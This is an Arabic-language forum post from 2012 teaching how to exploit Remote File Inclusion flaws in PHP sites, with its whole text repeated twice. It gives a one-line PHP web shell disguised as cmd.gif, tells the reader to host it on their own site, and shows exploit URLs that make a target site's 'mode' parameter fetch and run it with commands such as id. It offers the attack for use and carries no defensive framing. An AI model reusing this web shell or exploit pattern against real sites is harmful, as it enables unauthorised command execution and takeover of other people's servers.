Mr.JnOoN
11-22-2012, 05:39 PM
السلام عليكم
نيجي للشرح @@@@@@@@@
ثغرات File Inclusion
============================== =====
الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution
لكن الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه للاستغلال
مثال الاستغلال :
http://www******.net/index.php?mode=http://site?&cmd
http://site = موقعك
?&cmd = كود مرفوع بموقعك
افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif
كود:
<?
system($cmd);
?>
*/
وعند الاستغلال
http://www.*******.net/index.php?mode=http://site.com/cmd.gif?&cmd=id
...
أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))
و Remote Command Execution تستخدم أوامر اللينكس على مباشرة بدون كود مرفوع (( الـ idفقط ))
انشالله يكون الشرح بسيط ومفهوم
نيجي للشرح @@@@@@@@@
ثغرات File Inclusion
============================== =====
الثغرات المسماه Remote File Inclusion شبيهه بعمل Remote Command Execution
لكن الفرق يلزم كود لرفعه لموقعك ومن ثم تأخذ رابطه وتستخدمه للاستغلال
مثال الاستغلال :
http://www******.net/index.php?mode=http://site?&cmd
http://site = موقعك
?&cmd = كود مرفوع بموقعك
افتح النوت باد Notepad وادخل هذا الكود واحفظها باسم cmd.gif
كود:
<?
system($cmd);
?>
*/
وعند الاستغلال
http://www.*******.net/index.php?mode=http://site.com/cmd.gif?&cmd=id
...
أن Remote File Inclusion فيها كود ترفعه على موقعك وتستخدم الأوامر مكان الآي دي id ((رابط موقعك مع الـ id ))
و Remote Command Execution تستخدم أوامر اللينكس على مباشرة بدون كود مرفوع (( الـ idفقط ))
انشالله يكون الشرح بسيط ومفهوم